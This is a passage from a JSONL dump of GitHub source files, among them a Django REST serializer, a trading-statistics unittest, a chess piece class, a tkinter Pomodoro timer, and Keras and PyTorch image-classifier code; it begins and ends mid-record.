batch_size=batch_size, shuffle=False, num_workers=num_workers, collate_fn=collate_fn)\n return dataloader\n \ndef get_image_embedding(images, clippy, use_tensor=True):\n inputs = clippy(images=images, return_tensors=\"pt\", padding=True)\n return inputs['pixel_values']\n\ndef get_text_embedding(texts, clippy, use_tensor=True):\n inputs = clippy(text=texts, return_tensors=\"pt\", padding=True)\n return inputs['input_ids']\n\n","repo_name":"ed-fish/mm-ZSTAD","sub_path":"src/utils/dataset_utils.py","file_name":"dataset_utils.py","file_ext":"py","file_size_in_byte":6621,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"50"} +{"seq_id":"29970367260","text":"from rest_framework import serializers\nfrom dialer_campaign.models import Subscriber\n\n\nclass SubscriberListSerializer(serializers.HyperlinkedModelSerializer):\n\n \"\"\"\n **Read**:\n\n CURL Usage::\n\n curl -u username:password -H 'Accept: application/json' http://localhost:8000/rest-api/subscriber-list/\n\n Response::\n\n [\n {\n \"id\": 1,\n \"contact\": \"/rest-api/contact/11/\",\n \"campaign\": \"/rest-api/campaigns/3/\",\n \"last_attempt\": null,\n \"count_attempt\": 0,\n \"completion_count_attempt\": 0,\n \"duplicate_contact\": \"34235464\",\n \"status\": 1\n },\n {\n \"id\": 2,\n \"contact\": \"/rest-api/contact/12/\",\n \"campaign\": \"/rest-api/campaigns/3/\",\n \"last_attempt\": null,\n \"count_attempt\": 0,\n \"completion_count_attempt\": 0,\n \"duplicate_contact\": \"34235464\",\n \"status\": 1\n }\n ]\n \"\"\"\n class Meta:\n model = Subscriber\n fields = (\n 'url', 'contact', 'campaign', 'last_attempt', 'count_attempt',\n 'completion_count_attempt', 'status', 'created_date', 'updated_date',\n )\n","repo_name":"newfies-dialer/newfies-dialer","sub_path":"newfies/apirest/subscriber_list_serializers.py","file_name":"subscriber_list_serializers.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","stars":159,"dataset":"github-code","pt":"50"} +{"seq_id":"22016723244","text":"#========================================================\r\n#+++++++++++++++++ 测试用例信息 ++++++++++++++++\r\n# 用例 ID: FM_getHomeFollower\r\n# 用例标题: 获取首页的跟随者收益信息\r\n# 预置条件: \r\n# 测试步骤:\r\n# 1.不登录的情况下获取首页的跟随者收益信息\r\n# 预期结果:\r\n# 1.检查响应码为:200\r\n# 脚本作者: shencanhui\r\n# 写作日期: 20171211\r\n#=========================================================\r\nimport sys,unittest,json\r\nsys.path.append(\"../../lib/common\")\r\nsys.path.append(\"../../lib/webAPI\")\r\nsys.path.append(\"../../lib/statistic\")\r\nimport Auth,FMCommon,Common,PersonalPage,Statistic\r\nfrom socketIO_client import SocketIO\r\nfrom base64 import b64encode\r\nfrom prettytable import PrettyTable\r\n\r\nwebAPIData = FMCommon.loadWebAPIYML()\r\nauthData = FMCommon.loadAuthYML()\r\npersonalPageData = FMCommon.loadPersonalPageYML()\r\ncommonData = FMCommon.loadCommonYML()\r\nstatisticData = FMCommon.loadStatisticYML()\r\n\r\nclass StatisticsOfTrader(unittest.TestCase):\r\n def setUp(self):\r\n '''登录followme系统'''\r\n pass\r\n\r\n def test_1_getStatisticsOfTrader(self):\r\n '''获取用户的交易账号列表'''\r\n userID = \"148174\"\r\n accountIndex = \"2\"\r\n url = webAPIData['hostName']+personalPageData['getStatisticsOfTrader_url1'] + userID+'_'+accountIndex+ personalPageData['getStatisticsOfTrader_url2']\r\n statsticData=PersonalPage.getStatisticsOfTrader(url,headers=webAPIData['headers'],printLogs=1)\r\n #请求成功 返回 200\r\n self.assertEqual(statsticData.status_code,webAPIData['status_code_200'])\r\n statistic = json.loads(statsticData.text)[\"data\"]\r\n mt4Account = Statistic.getMt4Account(userID=userID,accountIndex=accountIndex)\r\n BrokerId = Statistic.BrokerId(userID=userID,accountIndex=accountIndex)\r\n\r\n factorProfitEquity = Statistic.factorProfitEquity(mt4Account=mt4Account,brokerID=BrokerId)\r\n rateProfit = Statistic.rateProfit(mt4Account=mt4Account,brokerID=BrokerId)\r\n moneyFollowSum = Statistic.moneyFollowSum(mt4Account=mt4Account,brokerID=BrokerId)\r\n profitFollowSum = Statistic.profitFollowSum(mt4Account=mt4Account,brokerID=BrokerId)\r\n # 获取净值利润因子,正在跟随总额与跟随获利总额\r\n topTable = PrettyTable([\"预期/实际\",\"userID\",\"accountIndex\",\"净值利润因子\",\"收益率\",\"正在跟随总额\",\"跟随获利总额\"])\r\n try:\r\n statstic = json.loads(statsticData.text)[\"data\"]\r\n topTable.add_row([\"预期结果\",userID,accountIndex,factorProfitEquity,rateProfit,moneyFollowSum,profitFollowSum])\r\n topTable.add_row([\"实际结果\",userID,accountIndex,statstic[\"ProfitFactor\"],statstic[\"ROI\"],statstic[\"AmountFollowing\"],statstic[\"FollowAllProfits\"]])\r\n #由于非实时统计数据,实际结果存在误差。预期和实际正负差值小于等于DELTA都算断言通过\r\n self.assertAlmostEqual(factorProfitEquity,float(statstic[\"ProfitFactor\"]),delta = 2)\r\n self.assertAlmostEqual(rateProfit,float(statstic[\"ROI\"]),delta = 100)\r\n # self.assertAlmostEqual(moneyFollowSum,float(statstic[\"AmountFollowing\"]),delta = 1000000)\r\n # self.assertAlmostEqual(profitFollowSum,float(statstic[\"FollowAllProfits\"]),delta = 1000000)\r\n finally:\r\n topTable.reversesort = True\r\n print(topTable)\r\n\r\n orderProfitClose = Statistic.orderProfitClose(mt4Account=mt4Account,brokerID=BrokerId)\r\n moneyProfitCloseMean = Statistic.moneyProfitCloseMean(mt4Account=mt4Account,brokerID=BrokerId)\r\n pointLossCloseMax = Statistic.pointLossCloseMax(mt4Account=mt4Account,brokerID=BrokerId)\r\n tradePipsSum = Statistic.tradePipsSum(mt4Account=mt4Account,brokerID=BrokerId)\r\n moneyCloseMean = Statistic.moneyCloseMean(mt4Account=mt4Account,brokerID=BrokerId)\r\n sharpeRatio = Statistic.sharpeRatio(mt4Account=mt4Account,brokerID=BrokerId)\r\n #获取交易概览的第一列数据\r\n oneColumn = PrettyTable([\"预期/实际\",\"ME指(废弃,未计算)\",\"盈利交易\",\"平均盈利\",\"最大亏损点数\",\"盈亏点数\",\"预期回报\",\"夏普比率\"])\r\n try:\r\n statstic = json.loads(statsticData.text)[\"data\"]\r\n oneColumn.add_row([\"预期结果\",statstic[\"FollowmeIndex\"],orderProfitClose,moneyProfitCloseMean,pointLossCloseMax,tradePipsSum,moneyCloseMean,sharpeRatio])\r\n oneColumn.add_row([\"实际结果\",statstic[\"FollowmeIndex\"],statstic[\"WinOrders\"],statstic[\"AverageProfit\"],statstic[\"MinPoint\"],statstic[\"Point\"],statstic[\"ExpectedReturn\"],statstic[\"Sharpe\"]])\r\n #由于非实时统计数据,实际结果存在误差。预期和实际正负差值小于等于DELTA都算断言通过\r\n self.assertAlmostEqual(orderProfitClose,float(statstic[\"WinOrders\"]),delta = 200)\r\n self.assertAlmostEqual(moneyProfitCloseMean,float(statstic[\"AverageProfit\"]),delta = 100)\r\n self.assertAlmostEqual(pointLossCloseMax,float(statstic[\"MinPoint\"]),delta = 1000000)\r\n self.assertAlmostEqual(tradePipsSum,float(statstic[\"Point\"]),delta = 1000000)\r\n self.assertAlmostEqual(moneyCloseMean,float(statstic[\"ExpectedReturn\"]),delta = 1000000)\r\n self.assertAlmostEqual(sharpeRatio,float(statstic[\"Sharpe\"]),delta = 1000000)\r\n finally:\r\n oneColumn.reversesort = True\r\n print(oneColumn)\r\n\r\n orderClose = Statistic.orderClose(mt4Account=mt4Account,brokerID=BrokerId)\r\n orderProfitLongClose = Statistic.orderProfitLongClose(mt4Account=mt4Account,brokerID=BrokerId)\r\n moneyLossCloseMean = Statistic.moneyLossCloseMean(mt4Account=mt4Account,brokerID=BrokerId)\r\n pointProfitCloseMean = Statistic.pointProfitCloseMean(mt4Account=mt4Account,brokerID=BrokerId)\r\n timePossessionAll = Statistic.timePossessionAll(mt4Account=mt4Account,brokerID=BrokerId)\r\n standardDeviation = Statistic.standardDeviation(mt4Account=mt4Account,brokerID=BrokerId)\r\n reTraceMent = Statistic.reTraceMent(mt4Account=mt4Account,brokerID=BrokerId)\r\n #获取交易概览的第二列数据\r\n twoColumn = PrettyTable([\"预期/实际\",\"交易笔数\",\"做多盈利交易\",\"平均亏损\",\"平均盈利点数\",\"平均持仓时间\",\"标准差\",\"最大回撤\"])\r\n try:\r\n statstic = json.loads(statsticData.text)[\"data\"]\r\n twoColumn.add_row([\"预期结果\",orderClose,orderProfitLongClose,moneyLossCloseMean,pointProfitCloseMean,str(timePossessionAll)+'分钟',standardDeviation,reTraceMent])\r\n twoColumn.add_row([\"实际结果\",statstic[\"Orders\"],statstic[\"WinAndBuyOrders\"],statstic[\"AverageLoss\"],statstic[\"AVGWinPoint\"],str(statstic[\"VHour\"])+'小时'+str(statstic[\"VMinue\"])+'分钟',statstic[\"StandardDeviation\"],statstic[\"VRetracement\"]])\r\n #由于非实时统计数据,实际结果存在误差。预期和实际正负差值小于等于DELTA都算断言通过\r\n self.assertAlmostEqual(orderClose,float(statstic[\"Orders\"]),delta = 200)\r\n self.assertAlmostEqual(orderProfitLongClose,float(statstic[\"WinAndBuyOrders\"]),delta = 100)\r\n self.assertAlmostEqual(moneyLossCloseMean,float(statstic[\"AverageLoss\"]),delta = 1000000)\r\n self.assertAlmostEqual(pointProfitCloseMean,float(statstic[\"AVGWinPoint\"]),delta = 1000000)\r\n self.assertAlmostEqual(timePossessionAll,float(statstic[\"VHour\"]*60+statstic[\"VMinue\"]),delta = 1000000)\r\n self.assertAlmostEqual(standardDeviation,float(statstic[\"StandardDeviation\"]),delta = 1000000)\r\n self.assertAlmostEqual(reTraceMent,float(statstic[\"VRetracement\"]),delta = 1000000)\r\n finally:\r\n twoColumn.reversesort = True\r\n print(twoColumn)\r\n\r\n orderLossClose = Statistic.orderLossClose(mt4Account=mt4Account,brokerID=BrokerId)\r\n orderProfitShortClose = Statistic.orderProfitShortClose(mt4Account=mt4Account,brokerID=BrokerId)\r\n pointProfitCloseMax = Statistic.pointProfitCloseMax(mt4Account=mt4Account,brokerID=BrokerId)\r\n pointLossCloseMean = Statistic.pointLossCloseMean(mt4Account=mt4Account,brokerID=BrokerId)\r\n pointOfCfClose = Statistic.pointOfCfClose(mt4Account=mt4Account,brokerID=BrokerId)\r\n activity = Statistic.activity(mt4Account=mt4Account,brokerID=BrokerId)\r\n #获取交易概览的第三列数据\r\n threeColumn = PrettyTable([\"预期/实际\",\"亏损交易\",\"做空盈利交易\",\"最大盈利点数\",\"平均亏损点数\",\"跟随获利点数\",\"活跃度\"])\r\n try:\r\n statstic = json.loads(statsticData.text)[\"data\"]\r\n threeColumn.add_row([\"预期结果\",orderLossClose,orderProfitShortClose,pointProfitCloseMax,pointLossCloseMean,pointOfCfClose,activity])\r\n threeColumn.add_row([\"实际结果\",statstic[\"LoseOrders\"],statstic[\"WinAndSellOrders\"],statstic[\"MaxPoint\"],statstic[\"AVGLosePoint\"],statstic[\"FollowPoint\"],statstic[\"VHour\"]])\r\n #由于非实时统计数据,实际结果存在误差。预期和实际正负差值小于等于DELTA都算断言通过\r\n self.assertAlmostEqual(orderLossClose,float(statstic[\"LoseOrders\"]),delta = 200)\r\n self.assertAlmostEqual(orderProfitShortClose,float(statstic[\"WinAndSellOrders\"]),delta = 100)\r\n self.assertAlmostEqual(pointProfitCloseMax,float(statstic[\"MaxPoint\"]),delta = 1000000)\r\n self.assertAlmostEqual(pointLossCloseMean,float(statstic[\"AVGLosePoint\"]),delta = 1000000)\r\n self.assertAlmostEqual(pointOfCfClose,float(statstic[\"FollowPoint\"]),delta = 1000000)\r\n self.assertAlmostEqual(activity,statstic[\"VHour\"],delta = 1000000)\r\n finally:\r\n threeColumn.reversesort = True\r\n print(threeColumn)\r\n\r\n def tearDown(self):\r\n #清空测试环境,还原测试数据\r\n #登出followme系统\r\n pass\r\n\r\nif __name__ == '__main__':\r\n unittest.main()\r\n\r\n","repo_name":"cccthon/webApiTest","sub_path":"test/statistics/WEB_mssql/FM_getStatisticsOfTrader.py","file_name":"FM_getStatisticsOfTrader.py","file_ext":"py","file_size_in_byte":10042,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"50"} +{"seq_id":"24393604554","text":"import csv\n\n\ndef load_csv(csvpath):\n\n with open(csvpath, 'r') as csvfile:\n data = []\n\n csvreader = csv.reader(csvfile, delimiter=',')\n next(csvreader) # Skip the CSV header\n\n for row in csvreader: # Read the CSV data\n data.append(row)\n return data\n\n\ndef save_csv(csvpath, data, header=None):\n\n with open(csvpath, 'w', newline=\"\") as csvfile:\n csvwriter = csv.writer(csvfile, delimiter=',')\n\n if header:\n csvwriter.writerow(header)\n csvwriter.writerows(data)\n","repo_name":"AngelR0/Loan_Qualifier","sub_path":"qualifier/utils/fileio.py","file_name":"fileio.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"38774844895","text":"from src import *\n\n\nclass Piece:\n \"\"\"\n Chess piece\n \"\"\"\n\n # TODO: verify that color, state and name are valid\n def __init__(self, name=None, is_white=None, state=None, square=None):\n self.name = name\n self.is_white = is_white\n self.state = state\n self.square = square\n self.valid_squares = self.compute_valid_squares()\n self.attack_squares = self.compute_attack_squares()\n\n color = \"w\" if is_white else \"b\"\n self.sprite = PieceSprite(self.square.x, self.square.y, self.name + color)\n\n def __str__(self):\n if (self.name is not None) and (self.is_white is not None):\n return self.name + (\"w\" if self.is_white else \"b\")\n else:\n return ' '\n\n def __repr__(self):\n color = \"w\" if self.is_white else \"b\"\n return \" \".join([self.name, color, str(self.state), str(self.square)])\n\n def change_square(self, new_square):\n self.square = new_square\n self.sprite.set_square(new_square.x, new_square.y)\n self.valid_squares = self.compute_valid_squares() # Update new valid individual squares\n self.attack_squares = self.compute_valid_squares() # Update new valid individual squares\n\n def compute_valid_squares(self):\n \"\"\"\n Compute all valid squares for the current piece as if it were alone in the board.\n :return: Dictionary with key = directions and values = list of valid squares\n \"\"\"\n types = {'R': Piece.valid_rook, 'B': Piece.valid_bishop, 'N': Piece.valid_knight,\n 'Q': Piece.valid_queen, 'K': Piece.valid_king, 'P': Piece.valid_pawn}\n\n def select_function(function, piece):\n return function(piece)\n\n return select_function(types.get(self.name), self)\n\n def compute_attack_squares(self):\n \"\"\"\n Compute squares that one piece can possibly attack to. Note: pawns attack different\n than the way they move\n :return: list of Squares\n \"\"\"\n\n if self.name == \"P\":\n direction = +1 if self.is_white else -1\n x1, y1 = self.square.values()\n s1, s2 = None, None\n if (-1 < x1 - 1 < 8) and (-1 < y1 + direction < 8):\n s1 = Square((x1 - 1, y1 + direction))\n if (-1 < x1 + 1 < 8) and (-1 < y1 + direction < 8):\n s2 = Square((x1 + 1, y1 + direction))\n\n attack_squares = {(1, direction): [s2], (-1, direction): [s1]}\n else:\n attack_squares = self.compute_valid_squares()\n\n return attack_squares\n\n @staticmethod\n def sort_valid_squares(square, valid_squares, valid_squares_sorted):\n \"\"\"\n Sort the valid squares according to their distance to the piece square.\n The sorting facilitates to filter the valid moves with respect to other pieces,\n yet this is done inside the Chess class.\n :param square: current square\n :param valid_squares: list of all valid squares\n :param valid_squares_sorted: Dictionary with the keys expected to be computed, and empty value lists to populate\n e.g.: For a rook, directions are (1,0), (0,1), (-1,0), (0,-1)\n :return: None\n \"\"\"\n\n x1, y1 = square.values()\n\n for v in valid_squares:\n x, y = v.values()\n dx = int((x - x1) / abs(x - x1)) if abs(x - x1) > 0 else 0\n dy = int((y - y1) / abs(y - y1)) if abs(y - y1) > 0 else 0\n valid_squares_sorted[(dx, dy)].append(v) # Populate dictionary\n\n # Sort valid squares with respect to the current square\n for direction, valid in valid_squares_sorted.items():\n if direction[0] < 0: # \"negative directions\" have inverse sorting\n reverse = True\n elif (direction[0] == 0) and (direction[1] < 0): # \"negative directions\" have inverse sorting\n reverse = True\n else:\n reverse = False\n\n valid_squares_sorted[direction] = sorted(valid_squares_sorted[direction], reverse=reverse)\n\n @staticmethod\n def valid_rook(piece):\n current_square = piece.square\n x1, y1 = piece.square.values()\n\n horizontal = {Square((x, y1)) for x in range(8)}\n vertical = {Square((x1, y)) for y in range(8)}\n valid_squares = sorted(horizontal ^ vertical) # symmetric difference\n\n valid_squares_sorted = {(1, 0): [], (0, 1): [], (-1, 0): [], (0, -1): []}\n\n Piece.sort_valid_squares(current_square, valid_squares, valid_squares_sorted)\n\n return valid_squares_sorted\n\n @staticmethod\n def valid_bishop(piece):\n current_square = piece.square\n\n x1, y1 = current_square.values()\n pos_diagonal = {Square((x, x - x1 + y1)) for x in range(8) if (-1 < x - x1 + y1 < 8)}\n neg_diagonal = {Square((x, -x + x1 + y1)) for x in range(8) if (-1 < -x + x1 + y1 < 8)}\n\n valid_squares = sorted(pos_diagonal ^ neg_diagonal) # symmetric difference\n\n valid_squares_sorted = {(1, 1): [], (-1, 1): [], (-1, -1): [], (1, -1): []}\n\n Piece.sort_valid_squares(current_square, valid_squares, valid_squares_sorted)\n\n return valid_squares_sorted\n\n @staticmethod\n def valid_knight(piece):\n current_square = piece.square\n x1, y1 = current_square.values()\n\n # Hard coding of the L movements of a knight, i.e. 2+1 or 1+2\n valid_squares = []\n for x, y in zip([2, 2, -2, -2, 1, 1, -1, -1], [1, -1, 1, -1, 2, -2, 2, -2]):\n if (-1 < x1 + x < 8) and (-1 < y1 + y < 8): # Select for within the board\n valid_squares.append(Square((x1 + x, y1 + y)))\n\n # No directional information is stored, since Knights can jump over pieces\n valid_squares_sorted = {(0, 0): valid_squares}\n\n return valid_squares_sorted\n\n @staticmethod\n def valid_queen(piece):\n return {**Piece.valid_rook(piece), **Piece.valid_bishop(piece)} # Queen moves as this combination\n\n @staticmethod\n def valid_king(piece):\n current_square = piece.square\n x1, y1 = current_square.values()\n\n valid_squares = []\n for x, y in zip([-1, -1, -1, 0, 0, 1, 1, 1], [1, 0, -1, 1, -1, 1, 0, -1]): # hard code all valid moves\n if (-1 < x1 + x < 8) and (-1 < y1 + y < 8): # Select for within the board\n valid_squares.append(Square((x1 + x, y1 + y)))\n\n valid_squares_sorted = {(1, 1): [], (-1, 1): [], (-1, -1): [], (1, -1): [],\n (1, 0): [], (0, 1): [], (-1, 0): [], (0, -1): []}\n\n Piece.sort_valid_squares(current_square, valid_squares, valid_squares_sorted)\n\n return valid_squares_sorted\n\n @staticmethod\n def valid_pawn(piece):\n current_square = piece.square\n x1, y1 = current_square.values()\n\n steps = 2 if current_square.y in [1, 6] else 1 # Starting pawns can jump 1 or 2 squares\n\n direction = +1 if piece.is_white else -1 # Black pawns move downwards, white pawns move upwards\n\n valid_squares = [Square((x1, y1 + direction * step)) for step in range(1, steps + 1) if\n (-1 < y1 + direction * step < 8)]\n\n valid_squares_sorted = {(0, direction): []}\n\n Piece.sort_valid_squares(current_square, valid_squares, valid_squares_sorted)\n\n return valid_squares_sorted\n\n\nif __name__ == \"__main__\":\n print(\"piece_ module\")\n","repo_name":"johnrest/pychess","sub_path":"src/piece_.py","file_name":"piece_.py","file_ext":"py","file_size_in_byte":7411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"11954318143","text":"'''\nhttps://www.acmicpc.net/problem/1535\n'''\n\nn = int(input()) #사람의 수\n\nstemina = [0] + list(map(int, input().split())) # 소모되는 체력\nhappy = [0] + list(map(int, input().split())) # 얻는 행복\n\ndp = [[0] * 101 for _ in range(n+1)]\n\n\nfor i in range(1, n+1):\n for j in range(1, 101):\n if stemina[i] <= j:\n dp[i][j] = max(dp[i-1][j], dp[i-1][j - stemina[i]] + happy[i])\n else:\n dp[i][j] = dp[i-1][j]\n\nprint(dp[n][99])","repo_name":"gogongkong/Python_Study","sub_path":"Month_07/Wk27/0709/백준_1535번_냅색_안녕_S2.py","file_name":"백준_1535번_냅색_안녕_S2.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"50"} +{"seq_id":"18349669518","text":"import tensorflow as tf\r\nfrom keras_preprocessing.image import ImageDataGenerator\r\nfrom tensorflow.keras.models import Sequential\r\nfrom tensorflow.keras.layers import Convolution2D, MaxPooling2D,Activation, Dropout, Flatten, Dense\r\nfrom tensorflow.keras.optimizers import Adam\r\n\r\n# 学习率,太高或太低可能导致无法收敛\r\nlearningRate = 0.0015\r\n# 训练中每次迭代步进\r\nstepsPerEpoch = 512\r\n# 迭代次数\r\nepoch = 64\r\n# 防止过拟合参数,过高导致欠拟合\r\ndropoutRate = 0.05\r\n# 随机对训练集横向平移比例\r\nwidthShiftRange = 0.02\r\n# 随机对训练集纵向平移比例\r\nheightShiftRange = 0.02,\r\n# 随机XY方向上的放大比例\r\nzoomRange = 0.08\r\n# 随机固定Y对X的平移比例\r\nshearRange = 0.12\r\n\r\nstdSize = (40 ,32)\r\n\r\n\r\ndef getClassesDict():\r\n return ImageDataGenerator().flow_from_directory(directory='./dataset/').class_indices\r\n\r\n\r\ndef train():\r\n trainDataGen = ImageDataGenerator(\r\n rotation_range=15,\r\n shear_range=shearRange,\r\n zoom_range=zoomRange,\r\n rescale=1 / 255,\r\n width_shift_range=widthShiftRange,\r\n height_shift_range=heightShiftRange,\r\n fill_mode='nearest'\r\n )\r\n trainGenerator = trainDataGen.flow_from_directory(\r\n directory='./dataset/',\r\n target_size=stdSize,\r\n color_mode=\"grayscale\",\r\n batch_size=10,\r\n )\r\n print(trainGenerator.class_indices)\r\n\r\n validDataGen = ImageDataGenerator(\r\n rotation_range=15,\r\n shear_range=shearRange,\r\n zoom_range=zoomRange,\r\n rescale=1 / 255,\r\n width_shift_range=widthShiftRange,\r\n height_shift_range=heightShiftRange,\r\n fill_mode='nearest'\r\n )\r\n validDataGenerator = validDataGen.flow_from_directory(\r\n directory='./valid/',\r\n target_size=stdSize,\r\n color_mode=\"grayscale\",\r\n batch_size=10,\r\n )\r\n\r\n model = Sequential()\r\n\r\n model.add(Convolution2D(16, (5, 5), input_shape=(40, 32, 1)))\r\n model.add(MaxPooling2D(2, 2))\r\n model.add(Activation('relu'))\r\n\r\n model.add(Convolution2D(32, (5, 5)))\r\n model.add(MaxPooling2D(2, 2))\r\n model.add(Activation('relu'))\r\n\r\n model.add(Flatten())\r\n\r\n model.add(Dense(42))\r\n model.add(Activation('relu'))\r\n model.add(Dropout(dropoutRate))\r\n model.add(Dense(42))\r\n model.add(Activation('sigmoid'))\r\n\r\n adam = Adam(lr=learningRate)\r\n model.compile(optimizer=adam, loss='categorical_crossentropy', metrics=['accuracy'])\r\n model.fit(\r\n trainGenerator,\r\n steps_per_epoch=stepsPerEpoch,\r\n epochs=epoch,\r\n validation_data=validDataGenerator,\r\n )\r\n\r\n model.save('./model.h5')\r\n\r\n info = 'Graduation Project ShuangJiang Du.\\n'\r\n info += 'Thanks MSRMZNM ANEKI ,ICG ANEKI for help.\\n'\r\n info += 'Using TensorFlow Version' + tf.__version__ + '.\\n'\r\n info += 'Save model as model.h5.\\n'\r\n print(info)\r\n","repo_name":"7a6bb3ef3/graduation","sub_path":"keras/snnn.py","file_name":"snnn.py","file_ext":"py","file_size_in_byte":2905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"73362515354","text":"from fastapi import APIRouter\n\n\nrouter = APIRouter()\n\n\n@router.get(\"/hello_world\")\nasync def hello_world() -> str:\n return \"Hello world!\"\n\n\n@router.get(\"/hello/{name}\")\nasync def hello_person(name: str) -> str:\n return f\"Hello {name}! I hope you're doing well.\"\n","repo_name":"crockeo/chaos","sub_path":"fixtures/hello_world.py","file_name":"hello_world.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"50"} +{"seq_id":"74067330394","text":"from typing import List\n\n\nclass Solution:\n\n def s(self, nums, left, right, target):\n if right - left == 1:\n if nums[right] == target:\n return True\n if nums[left] == target:\n return True\n return False\n\n mid = int((left + right) / 2)\n if nums[mid] == target:\n return True\n\n while nums[left] == nums[mid] == nums[right] and right - left > 1:\n right -= 1\n mid = int((left + right) / 2)\n if nums[mid] == target:\n return True\n\n if nums[right] <= nums[left] <= nums[mid]:\n if nums[left] <= target <= nums[mid]:\n return self.s(nums, left, mid, target)\n else:\n return self.s(nums, mid, right, target)\n if nums[mid] <= nums[right] <= nums[left]:\n if nums[mid] <= target <= nums[right]:\n return self.s(nums, mid, right, target)\n else:\n return self.s(nums,left, mid, target)\n\n if nums[left] <= nums[mid] <= nums[right]:\n if nums[left] <= target <= nums[mid]:\n return self.s(nums, left, mid, target)\n else:\n return self.s(nums, mid, right, target)\n\n def search(self, nums: List[int], target: int) -> bool:\n if len(nums) == 0:\n return False\n if len(nums) == 1:\n if nums[0] == target:\n return True\n else:\n return False\n return self.s(nums, 0, len(nums) - 1, target)","repo_name":"Cjz-Y/shuati","sub_path":"leetcode/81.py","file_name":"81.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"7614906982","text":"import math\nfrom functools import partial\nfrom tkinter import *\n\n# ---------------------------- CONSTANTS ------------------------------- #\nPINK = \"#e2979c\"\nRED = \"#e7305b\"\nGREEN = \"#9bdeac\"\nYELLOW = \"#f7f5dd\"\nFONT_NAME = \"Courier\"\nWORK_MIN = 25\nSHORT_BREAK_MIN = 5\nLONG_BREAK_MIN = 20\n\nreps = 0\ntimer = None\n# ---------------------------- TIMER RESET ------------------------------- #\n\ndef reset_timer():\n global reps, timer\n # Stop previous countdown\n reps = 0\n timer_label.config(text=\"TIMER\", fg=GREEN)\n # Reset to the working time text\n canvas.itemconfig(timer_text, text=f'{WORK_MIN}:00')\n check_marks.config(text=\"\")\n window.after_cancel(timer)\n\n# ---------------------------- TIMER MECHANISM ------------------------------- #\n\ndef start_timer():\n global reps\n reps += 1\n work_sec = WORK_MIN * 60\n short_break_sec = SHORT_BREAK_MIN * 60\n long_break_sec = LONG_BREAK_MIN * 60\n if reps % 2 == 0:\n timer_label.config(text=\"Short break\", fg=PINK, bg=YELLOW)\n count_down(short_break_sec)\n elif reps % 8 == 0:\n timer_label.config(text=\"Long break\", fg=RED)\n count_down(long_break_sec)\n else:\n timer_label.config(text=\"Work\", fg=GREEN)\n count_down(work_sec)\n# ---------------------------- COUNTDOWN MECHANISM ------------------------------- #\n\ndef count_down(count):\n global reps, timer\n count_minutes = math.floor(count / 60)\n count_seconds = count % 60\n canvas.itemconfig(timer_text, text=f'{str(count_minutes).zfill(2)}:{str(count_seconds).zfill(2)}')\n if count > 0:\n timer = window.after(1000, count_down, count - 1)\n else:\n start_timer()\n mark = \"\"\n work_sessions = math.floor(reps/2)\n for _ in range(work_sessions):\n mark += \"✔\"\n check_marks.config(text=mark)\n# ---------------------------- UI SETUP ------------------------------- #\n\nwindow = Tk()\nwindow.title(\"Pomodoro\")\n# padding the view so that the window is larger than the image itself\nwindow.config(padx=100, pady=50, bg=YELLOW)\n\ntimer_label = Label(text=\"Timer\", fg=GREEN, bg=YELLOW, font=(FONT_NAME, 40, \"bold\"))\ntimer_label.grid(column=1, row=0)\n\n# Things can be layered on the canvas\ncanvas = Canvas(width=360, height=360, bg=YELLOW, highlightthickness=0)\n\nmain_image = PhotoImage(file=\"tomato.png\")\n# Centering the image by putting it in half of width and half of height\ncanvas.create_image(180, 180, image=main_image)\n\ntimer_text = canvas.create_text(180, 180, text=f'{WORK_MIN}:00', fill=\"white\", font=(FONT_NAME, 35, \"bold\"))\ncanvas.grid(column=1, row=1)\n\nstart_button = Button(text=\"Start\", highlightthickness=0, highlightbackground= YELLOW, command=partial(start_timer))\nstart_button.grid(column=0, row=2)\n\nreset_button = Button(text=\"Reset\", highlightthickness=0, highlightbackground=YELLOW, command=reset_timer)\nreset_button.grid(column=2, row=2)\n\ncheck_marks = Label(fg=GREEN, bg=YELLOW)\ncheck_marks.grid(column=1, row=3)\n\nwindow.mainloop()\n","repo_name":"aintzevi/100-Days-of-Code-using-Python","sub_path":"day-28/pomodoro.py","file_name":"pomodoro.py","file_ext":"py","file_size_in_byte":2983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"22617946199","text":"import torchvision.models as models\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom transformers import ConvNextModel\n\nclass BaseModel(nn.Module):\n def __init__(self, num_classes=10):\n super(BaseModel, self).__init__()\n \n self.model = ConvNextModel.from_pretrained(\"facebook/convnext-base-224\")\n \n #self.classifier = Classifier(num_classes)\n\n self.A_classifier = nn.Linear(1024, num_classes)\n self.B_classifier = nn.Linear(1024, num_classes)\n self.C_classifier = nn.Linear(1024, num_classes)\n self.D_classifier = nn.Linear(1024, num_classes)\n self.E_classifier = nn.Linear(1024, num_classes)\n self.F_classifier = nn.Linear(1024, num_classes)\n self.G_classifier = nn.Linear(1024, num_classes)\n self.H_classifier = nn.Linear(1024, num_classes)\n self.I_classifier = nn.Linear(1024, num_classes)\n self.J_classifier = nn.Linear(1024, num_classes)\n self.softmax = nn.Softmax(dim=1)\n\n def forward(self, x):\n x = self.model(**x)\n x = x.pooler_output\n\n A_result = self.A_classifier(x)\n #A_result = F.softmax(A_result)\n\n B_result = self.B_classifier(x)\n #B_result = F.softmax(B_result)\n\n C_result = self.C_classifier(x)\n #C_result = F.softmax(C_result)\n\n D_result = self.D_classifier(x)\n #D_result = F.softmax(D_result)\n\n E_result = self.E_classifier(x)\n #E_result = F.softmax(E_result)\n\n F_result = self.F_classifier(x)\n #F_result = F.softmax(F_result)\n\n G_result = self.G_classifier(x)\n #G_result = 